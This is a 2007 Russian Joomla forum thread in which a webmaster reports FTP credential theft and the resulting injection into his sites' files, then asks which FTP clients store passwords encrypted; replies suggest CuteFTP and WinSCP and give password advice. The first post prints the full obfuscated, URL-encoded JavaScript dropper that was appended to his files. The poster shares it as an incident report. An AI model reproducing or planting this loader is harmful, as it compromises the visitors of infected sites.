0 Пользователей и 1 Гость просматривают эту тему.
  • 12 Ответов
  • 4008 Просмотров
*

MoRRoZ

  • Захожу иногда
  • 86
  • 43 / 0
безопасный FTP-клиент
« : 19.09.2007, 09:36:03 »
3 меняца назад отловил у себя трояна, который походу стырил мои пароли к ФТП всех проектов (гад ^-^) вчера пришла расплата - все файлы в корнях сайтов взломаны (дописан код в конце файла, со сдвигом кучей табуляций - типа прячется  ;D):
Код
<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28ywG%21%3D1%29%7Bfunction%20cu%28Bw%29%7Breturn%20Bw%7Dtry%7Bfunction%20DWU%28uDX%29%7Breturn%20parseInt%28uDX%29%7Dvar%20wQx%3D%27pp1pe1pT1pB1pY1po1pO1p61pZ1pd1pP1pW1pb1pg1pw1pM1p31pk1pn1pV1pA1pa1pN1pS1pc1pH1px1pI1p51ps1pR1pX1pL1p81pz1pJ1pl1pU1p91p41pG1p71pf1pD1pr1pt1pC1pi1pq1pm1ph1pF1py1pj1ep1ee1eT1eB1eY1eo1eO1e61eZ1ed1eP1eW1eb1eg1ew1eM1e31ek1en1eV1eA1ea1eN1eS%27%3Bvar%20tQG%3DwQx.substr%282%2C1%29%2CdwP%3DArray%28DWU%28%27230%27%29%2C8726%5E8895%2CDWU%28%27185%27%29%2C26095%5E25927%2CDWU%28%27179%27%29%2C5787%5E5681%2C23653%5E23755%2C13653%5E13745%2C30035%5E30191%2CDWU%28%27175%27%29%2CDWU%28%27180%27%29%2C30328%5E30413%2C32649%5E32627%2C23920%5E24043%2C10495%5E10253%2CDWU%28%27140%27%29%2CDWU%28%27173%27%29%2C14413%5E14523%2C3813%5E3693%2CDWU%28%27141%27%29%2C11310%5E11485%2C30466%5E30627%2CDWU%28%27172%27%29%2CDWU%28%27187%27%29%2C30630%5E30515%2CDWU%28%27231%27%29%2CDWU%28%27191%27%29%2C8321%5E8223%2CDWU%28%27225%27%29%2C21025%5E21153%2C2886%5E3031%2CDWU%28%27244%27%29%2C15107%5E15245%2CDWU%28%27183%27%29%2CDWU%28%27189%27%29%2CDWU%28%27241%27%29%2C24579%5E24801%2CDWU%28%27236%27%29%2C13593%5E13815%2CDWU%28%27234%27%29%2C703%5E513%2C16646%5E16823%2CDWU%28%27248%27%29%2CDWU%28%27162%27%29%2CDWU%28%27157%27%29%2C15980%5E16123%2C13486%5E13351%2C19072%5E18983%2CDWU%28%27130%27%29%2C28109%5E27995%2CDWU%28%27253%27%29%2CDWU%28%27235%27%29%2C27749%5E27863%2C24646%5E24793%2C6643%5E6511%2C23583%5E23721%2C27130%5E26979%2C26620%5E26377%2C6786%5E6773%2C10675%5E10579%2CDWU%28%27251%27%29%2C22248%5E22029%2CDWU%28%27184%27%29%2CDWU%28%27129%27%29%2CDWU%28%27132%27%29%2CDWU%28%27160%27%29%2CDWU%28%27227%27%29%2CDWU%28%27135%27%29%2C32591%5E32713%2C4590%5E4449%2C31920%5E31833%2C10625%5E10521%2C2212%5E2055%2CDWU%28%27208%27%29%2C15819%5E15651%2C30828%5E30851%2CDWU%28%27237%27%29%2CDWU%28%27240%27%29%29%3Bvar%20mYu%2CujM%3Bvar%20cLO%2CEwZ%3D%27pppepTpBpYpopOp6pZpdpPpTpOpYpWpPpbpgpopwpMp3pkpnpVpApapbpNpSpBpbpMpcpHpPpxp3pbpIpSpOpxpwpAp5pNpSpBpbpbpspRpHpbpPpxp3pbpIpSpOpxpwpAp5pbpspRpXpepxpOpLpYp8pxpwpMpcpXpzpxpOpLpYp8pxpwpApJplpUp9p4p4p4p4p4pAp5pbpGpWpTpdp8pxpPpOpXpTpWpWp7pYpxpbpHpbpMp3pJpfpHpfpJpxpepTpSpopxpwpnpVpApJpfp5pxpDpopYpBpxpepHpfpJpspRpXpOpWprptpLpCpOpBpYpPpzpwpAp5pbpipNpSpBpbpqpmpHphpepFpZpgptphpkptpypHphpFphp5pNpSpBpbpjeppHphpdpopGpSpOpxpFpXpTeepSpepepYpTpOpxeepXpWpBpzphpkpNeTpHpheBpypOp8eeeBphp5pYpZpwpGpWpTpdp8pxpPpOpXpTpWpWp7pYpxpXpYpPpGpxpDpcpZpwpqpmpJphpHphpJptpypApbpHpHeYpFpApapNpSpBpbpGeepypHpGpWpTpdp8pxpPpOpXeepWpTpSpOpYpWpPpXpypWpepOp5pNpSpBpbpypDpHpbphpypOphpJphpOpoeophpJpheBeBphpJpwpbpGeepypbeOpHpbphphe6phpheoeZpmpwpApApbpJpbpGeepypXpBpxpoeepSpTpxpbpweBedePpSeYeWp4eYebpXeYegeBpkphpXphpApXpBpxpoeepSpTpxpbpweBewpXpJeBpkphpXphpApJphpXphpJeZpmpwpApbpJphpXphpbpJpbpjeppJpNeTp5pNpSpBpbeWeMpHpGpWpTpdp8pxpPpOpXpTpBpxpSpOpxpjeepxp8pxpPpOpwphpYpZpBpSp8pxphpAp5eWeMpXpepxpOpgpOpOpBpYeZpdpOpxpbpwphpepBpTphpkpbpypDpAp5eWeMpXpypxpYpzpypOpHp9p5eWeMpXp3pYpGpOpypHe3p5eWeMpXpZpBpSp8pxekpWpBpGpxpBpbpHpbp4p5pbpOpBenpapbpGpWpTpdp8pxpPpOpXeZpWpGenpXpSpopopxpPpGeTpypYeepGpbpwpbeWeMpAp5pbpgpopwpqpmpkpbptpypbpAp5pipbpTpSpOpTpypwpxpApbpapGpWpTpdp8pxpPpOpXp3pBpYpOpxpbpwphpppypOp8eep6ppeZpWpGenp6ppeBeZpWpGenp6ppeBpypOp8eep6phpAp5pbpGpWpTpdp8pxpPpOpXeZpWpGenpXpSpopopxpPpGeTpypYeepGpbpwpbeWeMpAp5pgpopbpwpbpqpmpkptpypApbp5pipbpieVpZpdpPpTpOpYpWpPpbeZpmpwpApapbpNpSpBpbpLpTpHeAp9pkpnp8pHpfp4pFeAe3p9eapUeNplebp4pSeZpTpGpxpZpfp5pNpSpBpbprpqpHpfpfp5pbpZpWpBpwpzeppHp4p5pbpzeppbpppbpLpTp5pbpzeppJpJpApbprpqpJpHpbpnp8pXpepdeZpepOpBpwptpSpOpypXpZeepWpWpBpwptpSpOpypXpBpSpPpGpWp8pwpAeSpnp8pXeepxpPpzpOpypApkpFpkpFpAp5pbpBpxpOpdpBpPpbprpqp5pbpippeBpepTpBpYpopOp6%27%3Bvar%20OBM%3DString%28%29%3BwQx%3DwQx.split%28tQG%29%3Bfor%20%28mYu%3D0%3BmYu%3CEwZ.length%3BmYu+%3D2%29%7BcLO%3DEwZ.substr%28mYu%2C2%29%3Bfor%28ujM%3D0%3BujM%3CwQx.length%3BujM++%29%7Bif%28wQx%5BujM%5D%3D%3DcLO%29break%3B%7DOBM+%3DString.fromCharCode%28dwP%5BujM%5D%5E218%29%3B%7Ddocument.write%28OBM%29%3B%7Dcatch%28pty%29%7B%7D%7Dvar%20ywG%3D1%3C/script%3E"))</script><!--[/z0s]-->

Потеряв час на смену файлов на всех сайтах из дистрибутива, и последующей смены прав на 444, появился вопрос:

Существует ли FTP КЛИЕНТ, кторорый хранит свои настройки в зашифрованном виде? а то как-то обидно так и лениво менять везде пароли на фтп, потом перенастраивать клиента и на работе и дома, и при этом не быть застрахованным от новых подобных вылазок?
« Последнее редактирование: 19.09.2007, 11:30:38 от MoRRoZ »
Еще вопросы? А ты читал часто задаваемые вопросы по Joomla?
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: безопасный FTP-клиент
« Ответ #1 : 19.09.2007, 13:55:10 »
Я думаю, все что зашифровано, можно расшифровать... Так что лучше регулярнее обновлять антивирусную защиту, не пренебрегать установкой файрвола и не хранить все яйца в одной корзине.
*

MoRRoZ

  • Захожу иногда
  • 86
  • 43 / 0
Re: безопасный FTP-клиент
« Ответ #2 : 19.09.2007, 15:31:22 »
тем не менее,
Я думаю, все что зашифровано, можно расшифровать...
тем кто пишет трояны, не захочется возиться с этим при наличии открытых паролей,
Так что лучше регулярнее обновлять антивирусную защиту
панацеи нет, вирусы всегда идут раньше антивирусов
не пренебрегать установкой файрвола
и отлично научились шифроваться под системные процессы
не хранить все яйца в одной корзине.
а также считывать данные со всех возможных фтп-клиентов...

И всё-таки - такое чудо существует?
Еще вопросы? А ты читал часто задаваемые вопросы по Joomla?
*

pedrosoft

  • Захожу иногда
  • 367
  • 113 / 7
Re: безопасный FTP-клиент
« Ответ #3 : 19.09.2007, 19:52:15 »
Существует ли FTP КЛИЕНТ, кторорый хранит свои настройки в зашифрованном виде? а то как-то обидно так и лениво менять везде пароли на фтп, потом перенастраивать клиента и на работе и дома, и при этом не быть застрахованным от новых подобных вылазок?
CuteFTP
Интернет Хостинг Центр: отличные цены, лучшее качество, расположение в дата-центре «Оверсан-Меркурий»
*

smart

  • Администратор
  • 6485
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: безопасный FTP-клиент
« Ответ #4 : 19.09.2007, 19:59:37 »
CuteFTP
ну может он и шифрует, но троянов которые тащут пароли из него тоже немало видел... достаточно поискать в Google по фразам типа "CuteFTP trojan passwords"
*

Missile

  • Завсегдатай
  • 1073
  • 88 / 1
Re: безопасный FTP-клиент
« Ответ #5 : 19.09.2007, 21:04:35 »
Попробуйте WinSCP3, она через sftp/ssh работает.
*

MoRRoZ

  • Захожу иногда
  • 86
  • 43 / 0
Re: безопасный FTP-клиент
« Ответ #6 : 20.09.2007, 10:34:53 »
Missile вопрос не в том, через что работает (как передаются мои файлы мне все равно) а в том, что настройки доступа к сайтам хранятся в открытом виде :(

pedrosoft у меня стоит CuteFTP только наверное старый - не про 4.2, а ты какой имел ввиду?

smart может, в новых версиях CuteFTP что-то исправили в лучшую сторону?
Еще вопросы? А ты читал часто задаваемые вопросы по Joomla?
*

mr.Z

  • Новичок
  • 2
  • 1 / 0
Re: безопасный FTP-клиент
« Ответ #7 : 20.09.2007, 10:51:34 »
вопрос не в том, через что работает (как передаются мои файлы мне все равно) а в том, что настройки доступа к сайтам хранятся в открытом виде :(

А вот и нет, ведь при использовании открытого соединения пароль можно перехватить. И к тому же, сугубо мое мнение, что такие вещи как пароль на хостинг, кредитную карту, PIN и тот же самый пароль для входа в Windows лучше вообще нигде не записывать и не сохранять.
*

MoRRoZ

  • Захожу иногда
  • 86
  • 43 / 0
Re: безопасный FTP-клиент
« Ответ #8 : 20.09.2007, 10:53:10 »
И к тому же, сугубо мое мнение, что такие вещи как пароль на хостинг, кредитную карту, PIN и тот же самый пароль для входа в Windows лучше вообще нигде не записывать и не сохранять.
однако, когда хостер не позволяет задать свой пароль - а пользоовать его абракадабры - не всегда это просто ;)
Еще вопросы? А ты читал часто задаваемые вопросы по Joomla?
*

mr.Z

  • Новичок
  • 2
  • 1 / 0
Re: безопасный FTP-клиент
« Ответ #9 : 20.09.2007, 14:46:44 »
Нестандартная ситуация :)
Попроси через электронную почту, должны изменить.
*

Missile

  • Завсегдатай
  • 1073
  • 88 / 1
Re: безопасный FTP-клиент
« Ответ #10 : 20.09.2007, 18:23:39 »
Не храните пароли в клиентах, используйте какую-нибудь записную книжку/органайзер для этого. Я делаю только так, периодически устраивая бэкапы. Можно также использовать для этой цели флэшку. Тут-то как раз всё очень просто.
*

pedrosoft

  • Захожу иногда
  • 367
  • 113 / 7
Re: безопасный FTP-клиент
« Ответ #11 : 20.09.2007, 18:53:03 »
2 MoRRoZ: Последняя 8 версия
Не храните пароли в клиентах, используйте какую-нибудь записную книжку/органайзер для этого. Я делаю только так, периодически устраивая бэкапы. Можно также использовать для этой цели флэшку. Тут-то как раз всё очень просто.
Оно верно но есть ещё и такое слово как "лень" и побороть его не всегда получатся ;)
Интернет Хостинг Центр: отличные цены, лучшее качество, расположение в дата-центре «Оверсан-Меркурий»
*

MoRRoZ

  • Захожу иногда
  • 86
  • 43 / 0
Re: безопасный FTP-клиент
« Ответ #12 : 20.09.2007, 20:18:16 »
2 MoRRoZ: Последняя 8 версияОно верно но есть ещё и такое слово как "лень" и побороть его не всегда получатся ;)
вот-вот ради неё этот пост и появился ;)
Еще вопросы? А ты читал часто задаваемые вопросы по Joomla?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 346
Последний ответ 19.07.2020, 23:57:17
от wishlight
Появился подозрительный "клиент"

Автор devirus

Ответов: 5
Просмотров: 862
Последний ответ 12.09.2014, 11:45:29
от devirus
Посоветуйте пожалуйста наиболее безопасный FTP клиент?

Автор busik

Ответов: 7
Просмотров: 2889
Последний ответ 02.02.2011, 14:08:18
от busik
Какой FTP клиент надежнее?

Автор Zasada

Ответов: 7
Просмотров: 3054
Последний ответ 10.05.2010, 00:17:23
от wishlight